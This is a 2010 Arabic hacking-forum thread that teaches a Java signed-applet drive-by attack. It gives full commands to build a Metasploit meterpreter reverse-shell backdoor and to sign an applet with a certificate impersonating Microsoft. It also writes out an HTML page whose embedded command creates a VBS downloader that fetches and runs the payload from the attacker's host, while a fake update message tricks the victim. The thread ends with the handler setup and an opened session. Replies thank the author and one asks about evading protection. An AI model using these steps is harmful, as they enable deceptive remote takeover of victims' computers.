التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-06-2010, 09:15 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية punisher77
 

 

 
إحصائية العضو





punisher77 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
punisher77 is on a distinguished road

افتراضي شرح الاختراق عن طريق Applet Infection java




في البداية يجب أن نحمل جافا


كود:
      root@bt4:/# apt-get install sun-java6-jdk

نقوم بإنشاء مجلد ونسميه ****-applet


كود:
  root@bt4:/# mkdir ./java-applet 
    
     root@bt4:/# cd ./java-applet

بعد الدخول إلى المجلد نقوم بتحميل script و من أراد نسخه


كود:
t@bt4:/java-applet/# wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh

حفض هذا الكود بإسم MSFcmd
.java في مجلد جافا -applet

كود:
  import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends  Applet  {
public void init() {
Process f;
String first = getParameter("first");
try {
f = Runtime.getRuntime().exec("first");
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}
بعد تحميل script وإضافة كود جافا MSFcmd.جافا نقوم بتشغيل بالأمر ./makeapplet.sh

كود:
 
     root@bt4:/java-applet/# ./makeapplet.sh

Enter the **** of the  Applet  without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last ****? [Unknown]: MSFcmd
What is the **** of your organizational unit? [Unknown]: Microsoft
What is the **** of your organization? [Unknown]: Microsoft Organization
What is the **** of your City or Locality? [Unknown]: Redmond
What is the **** of your State or Province? [Unknown]: Washington
What is the two-letter country code for this unit? [Unknown]: US
Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=US correct? [no]: yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

عند الحصول على done وإدخال الاجابات المكتوبة بلون الأحمر نكتب الكود التالي


كود:
root@bt4:/java-applet/# cp SignedMSFcmd.jar /var/www/

كود:
root@bt4:/java-applet/# cp MSFcmd.class /var/www/


كود:
root@bt4:/java-applet/# apache2ctl start 

نعمل باكدور بالأداة msfpayload


كود:
root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t exe -o my.exe

كود:
root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www
/

كود:
root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe


الأن سنقوم بعمل صفحة ملقمة بالبكدور مع رسالة جافا لتحديث أمني ونقنع الضحية بالموافقة عليه
تغيير x xx x إلى ip

إعدادات الصفحة html في المرفقات


كود:
root@bt4:/pentest/exploits/framework3/# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > 
/var/www/index.html 
كود:
root@bt4:/pentest/exploits/framework3/# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> /var/www/index.html

كود:
root@bt4:/pentest/exploits/framework3/# echo "" >> /var/www/index.html
كود:
root@bt4:/pentest/exploits/framework3/# echo "Please wait. We appreciate your business. This process may take a while." >> /var/www/index.html

كود:
root@bt4:/pentest/exploits/framework3/# echo "To view this page properly you must accept and run the applet.
We are sorry for any inconvenience. " >> /var/www/index.html

نقوم الأن بتشغيل ميسبلويت مع الإداة multi/handler وبايلود meterpreter /reverse_tcp


كود:
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT +> 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) >exploit -j[*] Exploit running as background job.[*] Started reverse handler[*] Starting the payload handler
..
.

بعد الموافقة على التحديث ستفتح sessions


كود:
msf exploit(handler) >[*] Sending stage   (718336 bytes)[*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477)
 msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...

 meterpreter > ps

 Process list
============

     PID   ****           Path
     ---   ----           ----
     204   jusched.exe    C:\ProgramFiles\****\jre6\bin\jusched.exe
     288   ctfmon.exe     C:\WINDOWS\system32\ctfmon.exe
     744   smss.exe       \SystemRoot\System32\smss.exe
     912   winlogon.exe     C:\WINDOWS\system32\winlogon.exe
     972   services.exe   C:\WINDOWS\system32\services.exe
     984   lsass.exe      C:\WINDOWS\system32\lsass.exe
     1176  svchost.exe    C:\WINDOWS\system32\svchost.exe
     1256  ****.exe       C:\Program Files\****\jre6\bin\****.exe
     1360    svchost.exe    C:\WINDOWS\System32\svchost.exe
     1640  spoolsv.exe    C:\WINDOWS\system32\spoolsv.exe
     1712  Explorer.EXE   C:\WINDOWS\Explorer.EXE
     1872  jqs.exe        C:\Program Files\****\jre6\bin\jqs.exe
     2412  my.exe         C:\windows\my.exe
     3052  iexplore.exe     C:\Program Files\Internet Explorer\iexplore.exe

 meterpreter >

كما في الصورة التالية



avp hghojvhr uk 'vdr Applet Infection java

التوقيع

http://www.vbspiders.com/vb/members/...1-user7796.jpg

 

   

رد مع اقتباس
قديم 02-06-2010, 09:57 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
ReD-HaT
~|M4$T3R|~
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو









ReD-HaT غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ReD-HaT is on a distinguished road

افتراضي


مشكووووووووووووور اخي معاقب تحياتي لك يا طيب

تقبل مروري

   

رد مع اقتباس
قديم 02-06-2010, 11:37 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


great bro keep up

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 02-06-2010, 11:40 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


ارجو في اكمرة القادمة ان يكون الشرح مصور لتفادي الحماية

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 02-06-2010, 12:55 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية waaa
 

 

 
إحصائية العضو






waaa غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
waaa is on a distinguished road

افتراضي


مشكور الله يعطيك الف عافية سيتم التجريب في اقرب فرصة

شكرا لك ثانية ننظر جديدك يامبدع

التوقيع

"سبحان الله وبحمده سبحان الله العظيم"http://www.gmrup.com/gmrfile/gmrup12653165661.jpg

 

   

رد مع اقتباس
قديم 02-07-2010, 03:20 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


بارك الله فيك ياغالي وهل يمكنني بهذه الطريقه الاختراق عن طريق الاي بي لانني لم افهم
على العموم

مشكور ياغالي وواصل بلا فواصل ..


بالتوفيق يابطل ..

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-07-2010, 06:35 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية punisher77
 

 

 
إحصائية العضو





punisher77 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
punisher77 is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.NaNo
بارك الله فيك ياغالي وهل يمكنني بهذه الطريقه الاختراق عن طريق الاي بي لانني لم افهم
على العموم

مشكور ياغالي وواصل بلا فواصل ..


بالتوفيق يابطل ..

نعم يمكن ذلك بعد تشغيل webserver تكتب ip الجهاز الحقيقي ومن هذي الطريقة يمكن رفع باتش إلى جهاز الضحية:666: 192.168.1.2/server.exe
المهم المسار الموجود فيه الملف وشكراً على الردود:a14: في بعض الأحيان يسألني احدهم عن مشكلات :grr:ما أنا لا ادعي المعرفة ومازلت مبتدئ :icon666: ولكن الفرق هو حب البحث والمطالعة بنفسي و إذا واجهت مشكلة أصر على لبحث حتى أجد الحل.:a43:
تجد الكثيرين يظنون أن الميتا كبرنامج بفروست:a43: تضع ip و-exploit تخترق الجهاز لا ليست بتلك السهولة و تجد في أحيان كثيرة لا يعرف شيء عن الإداة:088: فلها موقع رسمي مجاني فيه جميع الاوامر المهمة يجب الاطلاع عليها ومهم تثبيت برنامج وهمي لعمل pentest lab لتجرب عليها الثغرات وتفهم كيف تعمل
:a41:
التوقيع

http://www.vbspiders.com/vb/members/...1-user7796.jpg

 

   

رد مع اقتباس
قديم 02-07-2010, 09:20 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Sp1d3r
 

 

 
إحصائية العضو





Sp1d3r غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sp1d3r is on a distinguished road

افتراضي


يعطيك العافية
دمت بخير

   

رد مع اقتباس
قديم 03-16-2010, 03:33 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Silv3r00t
 

 

 
إحصائية العضو





Silv3r00t غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Silv3r00t is on a distinguished road

افتراضي


مشكور وتقبل مروري

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح الاختراق بالصفحت الملغمة ((شــرح مصــور))Java Drive-By Dr-j0k قســم إختــراق الأجهــزة 16 11-01-2011 12:15 AM
اختراق الأجهزة عن طريق Java Applet synyster-hacker قســم إختــراق الأجهــزة 9 10-24-2011 04:31 PM
الاختراق عن طريق الايبي (الاختراق المستهدف)نقاااش وطرق ابو بدر قســم إختــراق الأجهــزة 22 02-12-2011 03:39 AM
Java Applet Attack Cyber Cool MetaSploit 15 02-03-2011 11:48 PM
METASPLOIT : java-signed-applet data$hack MetaSploit 3 07-20-2010 04:44 AM


الساعة الآن 03:36 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0